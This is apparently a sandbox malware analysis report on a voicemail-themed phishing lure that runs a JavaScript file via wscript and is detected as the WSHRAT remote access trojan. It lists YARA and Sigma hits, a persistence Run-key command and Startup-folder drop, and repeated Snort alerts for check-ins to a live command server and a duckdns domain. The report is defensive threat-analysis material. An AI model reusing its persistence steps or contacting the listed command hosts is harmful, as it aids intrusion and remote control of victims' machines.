00000011.00000003.2444105297.00000210130F7000.00000004.00000020.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_JS_WMI_ExecQuery	Detects JS potentially executing WMI queries	ditekSHen	0x4f6d4:$ex: .ExecQuery( 0x4ff0f:$ex: .ExecQuery( 0x50047:$ex: .ExecQuery( 0x501a0:$ex: .ExecQuery( 0x52a50:$ex: .ExecQuery( 0x4ef7f:$s1: GetObject( 0x4f6b3:$s1: GetObject( 0x4feee:$s1: GetObject( 0x50028:$s1: GetObject( 0x5017b:$s1: GetObject( 0x52a31:$s1: GetObject( 0x50cd8:$s2: String.fromCharCode( 0x527ab:$s2: String.fromCharCode( 0x527d2:$s2: String.fromCharCode( 0x530bf:$s2: String.fromCharCode( 0x530f8:$s2: String.fromCharCode( 0x4c06d:$s3: ActiveXObject( 0x4c579:$s3: ActiveXObject( 0x4de0f:$s4: .sleep( 0x4e4d5:$s4: .sleep( 0x4f903:$s4: .sleep(
0000000B.00000003.2047368224.0000000005204000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_WSHRAT	Yara detected WSHRAT	Joe Security
0000000B.00000003.2047368224.0000000005204000.00000004.00000020.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_JS_WMI_ExecQuery	Detects JS potentially executing WMI queries	ditekSHen	0x96674:$ex: .ExecQuery( 0x96eaf:$ex: .ExecQuery( 0x96fe7:$ex: .ExecQuery( 0x97140:$ex: .ExecQuery( 0x999f0:$ex: .ExecQuery( 0x95f1f:$s1: GetObject( 0x96653:$s1: GetObject( 0x96e8e:$s1: GetObject( 0x96fc8:$s1: GetObject( 0x9711b:$s1: GetObject( 0x999d1:$s1: GetObject( 0x97c78:$s2: String.fromCharCode( 0x9974b:$s2: String.fromCharCode( 0x99772:$s2: String.fromCharCode( 0x9a05f:$s2: String.fromCharCode( 0x9a098:$s2: String.fromCharCode( 0x9300d:$s3: ActiveXObject( 0x93519:$s3: ActiveXObject( 0x94daf:$s4: .sleep( 0x95475:$s4: .sleep( 0x968a3:$s4: .sleep(
0000000C.00000003.2092684570.00000000059AF000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_WSHRAT	Yara detected WSHRAT	Joe Security
0000000C.00000003.2092684570.00000000059AF000.00000004.00000020.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_JS_WMI_ExecQuery	Detects JS potentially executing WMI queries	ditekSHen	0x96674:$ex: .ExecQuery( 0x96eaf:$ex: .ExecQuery( 0x96fe7:$ex: .ExecQuery( 0x97140:$ex: .ExecQuery( 0x999f0:$ex: .ExecQuery( 0x95f1f:$s1: GetObject( 0x96653:$s1: GetObject( 0x96e8e:$s1: GetObject( 0x96fc8:$s1: GetObject( 0x9711b:$s1: GetObject( 0x999d1:$s1: GetObject( 0x97c78:$s2: String.fromCharCode( 0x9974b:$s2: String.fromCharCode( 0x99772:$s2: String.fromCharCode( 0x9a05f:$s2: String.fromCharCode( 0x9a098:$s2: String.fromCharCode( 0x9300d:$s3: ActiveXObject( 0x93519:$s3: ActiveXObject( 0x94daf:$s4: .sleep( 0x95475:$s4: .sleep( 0x968a3:$s4: .sleep(
Process Memory Space: 7za.exe PID: 2936	JoeSecurity_WSHRAT	Yara detected WSHRAT	Joe Security
Process Memory Space: 7za.exe PID: 2936	INDICATOR_SUSPICIOUS_JS_WMI_ExecQuery	Detects JS potentially executing WMI queries	ditekSHen	0x67ba:$ex: .ExecQuery( 0xb43e:$ex: .ExecQuery( 0xbc79:$ex: .ExecQuery( 0xbdb1:$ex: .ExecQuery( 0xbf0a:$ex: .ExecQuery( 0x679b:$s1: GetObject( 0xace9:$s1: GetObject( 0xb41d:$s1: GetObject( 0xbc58:$s1: GetObject( 0xbd92:$s1: GetObject( 0xbee5:$s1: GetObject( 0x6515:$s2: String.fromCharCode( 0x653c:$s2: String.fromCharCode( 0x6e29:$s2: String.fromCharCode( 0x6e62:$s2: String.fromCharCode( 0xca42:$s2: String.fromCharCode( 0x7dd7:$s3: ActiveXObject( 0x82e3:$s3: ActiveXObject( 0x5451:$s4: .sleep( 0x5498:$s4: .sleep( 0x65c2:$s4: .sleep(
Process Memory Space: wscript.exe PID: 7076	JoeSecurity_WSHRAT	Yara detected WSHRAT	Joe Security
Process Memory Space: wscript.exe PID: 7076	INDICATOR_SUSPICIOUS_JS_WMI_ExecQuery	Detects JS potentially executing WMI queries	ditekSHen	0xac835:$ex: .ExecQuery( 0xad070:$ex: .ExecQuery( 0xad1a8:$ex: .ExecQuery( 0xad301:$ex: .ExecQuery( 0xafbb1:$ex: .ExecQuery( 0x1495d7:$ex: .ExecQuery( 0x149e12:$ex: .ExecQuery( 0x149f4a:$ex: .ExecQuery( 0x14a0a3:$ex: .ExecQuery( 0x14c953:$ex: .ExecQuery( 0x1e6aa9:$ex: .ExecQuery( 0x1e72e4:$ex: .ExecQuery( 0x1e741c:$ex: .ExecQuery( 0x1e7575:$ex: .ExecQuery( 0x1e9e25:$ex: .ExecQuery( 0x314337:$ex: .ExecQuery( 0x314b72:$ex: .ExecQuery( 0x314caa:$ex: .ExecQuery( 0x314e03:$ex: .ExecQuery( 0x3176b3:$ex: .ExecQuery( 0x3365ef:$ex: .ExecQuery(
Process Memory Space: wscript.exe PID: 1544	JoeSecurity_WSHRAT	Yara detected WSHRAT	Joe Security
Process Memory Space: wscript.exe PID: 1544	INDICATOR_SUSPICIOUS_JS_WMI_ExecQuery	Detects JS potentially executing WMI queries	ditekSHen	0x16b6c:$ex: .ExecQuery( 0x173a7:$ex: .ExecQuery( 0x174df:$ex: .ExecQuery( 0x17638:$ex: .ExecQuery( 0x19ee8:$ex: .ExecQuery( 0x622c3:$ex: .ExecQuery( 0x62afe:$ex: .ExecQuery( 0x62c36:$ex: .ExecQuery( 0x62d8f:$ex: .ExecQuery( 0x6563f:$ex: .ExecQuery( 0x8e7bf:$ex: .ExecQuery( 0x8e7f0:$ex: .ExecQuery( 0x8e825:$ex: .ExecQuery( 0x90361:$ex: .ExecQuery( 0x903a7:$ex: .ExecQuery( 0x9041a:$ex: .ExecQuery( 0x12b123:$ex: .ExecQuery( 0x12b95e:$ex: .ExecQuery( 0x12ba96:$ex: .ExecQuery( 0x12bbef:$ex: .ExecQuery( 0x12e49f:$ex: .ExecQuery(
Process Memory Space: wscript.exe PID: 6936	JoeSecurity_WSHRAT	Yara detected WSHRAT	Joe Security
Process Memory Space: wscript.exe PID: 6936	INDICATOR_SUSPICIOUS_JS_WMI_ExecQuery	Detects JS potentially executing WMI queries	ditekSHen	0x11645a:$ex: .ExecQuery( 0x116c95:$ex: .ExecQuery( 0x116dcd:$ex: .ExecQuery( 0x116f26:$ex: .ExecQuery( 0x1197d6:$ex: .ExecQuery( 0x1ca280:$ex: .ExecQuery( 0x1caabb:$ex: .ExecQuery( 0x1cabf3:$ex: .ExecQuery( 0x1cad4c:$ex: .ExecQuery( 0x1cd5fc:$ex: .ExecQuery( 0x264623:$ex: .ExecQuery( 0x264e5e:$ex: .ExecQuery( 0x264f96:$ex: .ExecQuery( 0x2650ef:$ex: .ExecQuery( 0x26799f:$ex: .ExecQuery( 0x33611f:$ex: .ExecQuery( 0x33695a:$ex: .ExecQuery( 0x336a92:$ex: .ExecQuery( 0x336beb:$ex: .ExecQuery( 0x33949b:$ex: .ExecQuery( 0x3d5902:$ex: .ExecQuery(
Click to see the 65 entries

Sigma Signatures

System Summary

Sigma detected: Script Initiated Connection to Non-Local Network

Source: Network Connection

Author: frack113, Florian Roth: Data: DestinationIp: 104.21.25.148, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\wscript.exe, Initiated: true, ProcessId: 7076, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49772

Sigma detected: Script Interpreter Execution From Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\2otik2vy.ast\New Voicemail May 9 _mp4.js" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\2otik2vy.ast\New Voicemail May 9 _mp4.js" , CommandLine|base64offset|contains: Vzf, Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "cmd.exe" /C "C:\Users\user\AppData\Local\Temp\2otik2vy.ast\New Voicemail May 9 _mp4.js", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6952, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\2otik2vy.ast\New Voicemail May 9 _mp4.js" , ProcessId: 7076, ProcessName: wscript.exe

Sigma detected: Suspicious Script Execution From Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\2otik2vy.ast\New Voicemail May 9 _mp4.js" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\2otik2vy.ast\New Voicemail May 9 _mp4.js" , CommandLine|base64offset|contains: Vzf, Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "cmd.exe" /C "C:\Users\user\AppData\Local\Temp\2otik2vy.ast\New Voicemail May 9 _mp4.js", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6952, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\2otik2vy.ast\New Voicemail May 9 _mp4.js" , ProcessId: 7076, ProcessName: wscript.exe

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\2otik2vy.ast\New Voicemail May 9 _mp4.js" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\2otik2vy.ast\New Voicemail May 9 _mp4.js" , CommandLine|base64offset|contains: Vzf, Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "cmd.exe" /C "C:\Users\user\AppData\Local\Temp\2otik2vy.ast\New Voicemail May 9 _mp4.js", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6952, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\2otik2vy.ast\New Voicemail May 9 _mp4.js" , ProcessId: 7076, ProcessName: wscript.exe

Sigma detected: WScript or CScript Dropper - File

Source: File created

Author: Tim Shelton: Data: EventID: 11, Image: C:\Windows\SysWOW64\wscript.exe, ProcessId: 7076, TargetFilename: C:\Users\user\AppData\Local\Temp\New Voicemail May 9 _mp4.js

Sigma detected: Script Initiated Connection

Source: Network Connection

Author: frack113: Data: DestinationIp: 104.21.25.148, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\wscript.exe, Initiated: true, ProcessId: 7076, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49772

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\2otik2vy.ast\New Voicemail May 9 _mp4.js" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\2otik2vy.ast\New Voicemail May 9 _mp4.js" , CommandLine|base64offset|contains: Vzf, Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "cmd.exe" /C "C:\Users\user\AppData\Local\Temp\2otik2vy.ast\New Voicemail May 9 _mp4.js", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6952, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\2otik2vy.ast\New Voicemail May 9 _mp4.js" , ProcessId: 7076, ProcessName: wscript.exe

Data Obfuscation

Sigma detected: Drops script at startup location

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\wscript.exe, ProcessId: 7076, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\New Voicemail May 9 _mp4.js

Persistence and Installation Behavior

Sigma detected: Register Wscript In Run Key

Source: Registry Key set

Author: Joe Security: Data: Details: wscript.exe //B "C:\Users\user\AppData\Local\Temp\New Voicemail May 9 _mp4.js", EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\wscript.exe, ProcessId: 7076, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\New Voicemail May 9 _mp4

Snort Signatures

ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 - Source IP: 192.168.2.4 - Destination IP: 45.133.174.75

Timestamp:	05/10/24-21:33:11.552728
SID:	2017516
Source Port:	49802
Destination Port:	8426
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 - Source IP: 192.168.2.4 - Destination IP: 45.133.174.75

Timestamp:	05/10/24-21:33:50.098826
SID:	2017516
Source Port:	49809
Destination Port:	8426
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 - Source IP: 192.168.2.4 - Destination IP: 45.133.174.75

Timestamp:	05/10/24-21:34:08.142731
SID:	2017516
Source Port:	49812
Destination Port:	8426
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 - Source IP: 192.168.2.4 - Destination IP: 45.133.174.75

Timestamp:	05/10/24-21:32:00.451494
SID:	2017516
Source Port:	49781
Destination Port:	8426
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 - Source IP: 192.168.2.4 - Destination IP: 45.133.174.75

Timestamp:	05/10/24-21:34:25.740081
SID:	2017516
Source Port:	49815
Destination Port:	8426
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 - Source IP: 192.168.2.4 - Destination IP: 45.133.174.75

Timestamp:	05/10/24-21:33:28.102727
SID:	2017516
Source Port:	49805
Destination Port:	8426
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 - Source IP: 192.168.2.4 - Destination IP: 45.133.174.75

Timestamp:	05/10/24-21:32:18.321299
SID:	2017516
Source Port:	49785
Destination Port:	8426
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 - Source IP: 192.168.2.4 - Destination IP: 45.133.174.75

Timestamp:	05/10/24-21:32:47.103341
SID:	2017516
Source Port:	49797
Destination Port:	8426
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 - Source IP: 192.168.2.4 - Destination IP: 45.133.174.75

Timestamp:	05/10/24-21:34:01.098811
SID:	2017516
Source Port:	49811
Destination Port:	8426
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 - Source IP: 192.168.2.4 - Destination IP: 45.133.174.75

Timestamp:	05/10/24-21:34:31.206769
SID:	2017516
Source Port:	49816
Destination Port:	8426
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 - Source IP: 192.168.2.4 - Destination IP: 45.133.174.75

Timestamp:	05/10/24-21:32:29.388653
SID:	2017516
Source Port:	49790
Destination Port:	8426
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 - Source IP: 192.168.2.4 - Destination IP: 45.133.174.75

Timestamp:	05/10/24-21:33:33.603192
SID:	2017516
Source Port:	49806
Destination Port:	8426
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 - Source IP: 192.168.2.4 - Destination IP: 45.133.174.75

Timestamp:	05/10/24-21:32:41.618399
SID:	2017516
Source Port:	49796
Destination Port:	8426
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 - Source IP: 192.168.2.4 - Destination IP: 45.133.174.75

Timestamp:	05/10/24-21:33:39.095869
SID:	2017516
Source Port:	49807
Destination Port:	8426
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 - Source IP: 192.168.2.4 - Destination IP: 45.133.174.75

Timestamp:	05/10/24-21:33:55.568790
SID:	2017516
Source Port:	49810
Destination Port:	8426
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 - Source IP: 192.168.2.4 - Destination IP: 45.133.174.75

Timestamp:	05/10/24-21:32:12.519075
SID:	2017516
Source Port:	49783
Destination Port:	8426
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 - Source IP: 192.168.2.4 - Destination IP: 45.133.174.75

Timestamp:	05/10/24-21:33:17.054284
SID:	2017516
Source Port:	49803
Destination Port:	8426
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 - Source IP: 192.168.2.4 - Destination IP: 45.133.174.75

Timestamp:	05/10/24-21:33:04.905715
SID:	2017516
Source Port:	49801
Destination Port:	8426
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 - Source IP: 192.168.2.4 - Destination IP: 45.133.174.75

Timestamp:	05/10/24-21:33:44.596858
SID:	2017516
Source Port:	49808
Destination Port:	8426
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 - Source IP: 192.168.2.4 - Destination IP: 45.133.174.75

Timestamp:	05/10/24-21:32:06.998425
SID:	2017516
Source Port:	49782
Destination Port:	8426
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 - Source IP: 192.168.2.4 - Destination IP: 45.133.174.75

Timestamp:	05/10/24-21:32:23.793919
SID:	2017516
Source Port:	49789
Destination Port:	8426
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 - Source IP: 192.168.2.4 - Destination IP: 45.133.174.75

Timestamp:	05/10/24-21:32:36.094227
SID:	2017516
Source Port:	49795
Destination Port:	8426
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 - Source IP: 192.168.2.4 - Destination IP: 45.133.174.75

Timestamp:	05/10/24-21:34:13.595581
SID:	2017516
Source Port:	49813
Destination Port:	8426
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 - Source IP: 192.168.2.4 - Destination IP: 45.133.174.75

Timestamp:	05/10/24-21:34:20.217922
SID:	2017516
Source Port:	49814
Destination Port:	8426
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 - Source IP: 192.168.2.4 - Destination IP: 45.133.174.75

Timestamp:	05/10/24-21:32:52.908212
SID:	2017516
Source Port:	49799
Destination Port:	8426
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 - Source IP: 192.168.2.4 - Destination IP: 45.133.174.75

Timestamp:	05/10/24-21:33:22.607980
SID:	2017516
Source Port:	49804
Destination Port:	8426
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 - Source IP: 192.168.2.4 - Destination IP: 45.133.174.75

Timestamp:	05/10/24-21:32:59.305277
SID:	2017516
Source Port:	49800
Destination Port:	8426
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

Phishing

HTML document with suspicious title

Source: file:///C:/Users/user/Desktop/Voicemail%20Jud.html

Tab title: Sign | Voicemail

Source: C:\Windows\SysWOW64\unarchiver.exe

File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 23.221.246.93:443 -> 192.168.2.4:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.221.246.93:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.4:49748 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.25.148:443 -> 192.168.2.4:49772 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49773 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.4:49775 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.25.148:443 -> 192.168.2.4:49776 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49777 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.4:49779 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.4:49784 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.25.148:443 -> 192.168.2.4:49791 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49792 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.4:49794 version: TLS 1.2

Source: C:\Windows\SysWOW64\wscript.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

Child: C:\Windows\SysWOW64\wscript.exe

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49781 -> 45.133.174.75:8426
Source: Traffic	Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49782 -> 45.133.174.75:8426
Source: Traffic	Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49783 -> 45.133.174.75:8426
Source: Traffic	Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49785 -> 45.133.174.75:8426
Source: Traffic	Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49789 -> 45.133.174.75:8426
Source: Traffic	Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49790 -> 45.133.174.75:8426
Source: Traffic	Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49795 -> 45.133.174.75:8426
Source: Traffic	Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49796 -> 45.133.174.75:8426
Source: Traffic	Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49797 -> 45.133.174.75:8426
Source: Traffic	Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49799 -> 45.133.174.75:8426
Source: Traffic	Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49800 -> 45.133.174.75:8426
Source: Traffic	Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49801 -> 45.133.174.75:8426
Source: Traffic	Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49802 -> 45.133.174.75:8426
Source: Traffic	Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49803 -> 45.133.174.75:8426
Source: Traffic	Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49804 -> 45.133.174.75:8426
Source: Traffic	Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49805 -> 45.133.174.75:8426
Source: Traffic	Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49806 -> 45.133.174.75:8426
Source: Traffic	Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49807 -> 45.133.174.75:8426
Source: Traffic	Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49808 -> 45.133.174.75:8426
Source: Traffic	Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49809 -> 45.133.174.75:8426
Source: Traffic	Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49810 -> 45.133.174.75:8426
Source: Traffic	Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49811 -> 45.133.174.75:8426
Source: Traffic	Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49812 -> 45.133.174.75:8426
Source: Traffic	Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49813 -> 45.133.174.75:8426
Source: Traffic	Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49814 -> 45.133.174.75:8426
Source: Traffic	Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49815 -> 45.133.174.75:8426
Source: Traffic	Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.4:49816 -> 45.133.174.75:8426

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\wscript.exe	Network Connect: 45.133.174.75 8426	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Network Connect: 149.154.167.220 443	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Network Connect: 208.95.112.1 80	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Network Connect: 104.21.25.148 443	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Network Connect: 172.67.19.24 443	Jump to behavior

Connects to a pastebin service (likely for C&C)

Source: unknown

DNS query: name: pastebin.com

Uses dynamic DNS services

Source: unknown

DNS query: name: masterokrwh.duckdns.org

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 8426
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 8426
Source: unknown	Network traffic detected: HTTP traffic on port 49783 -> 8426
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 8426
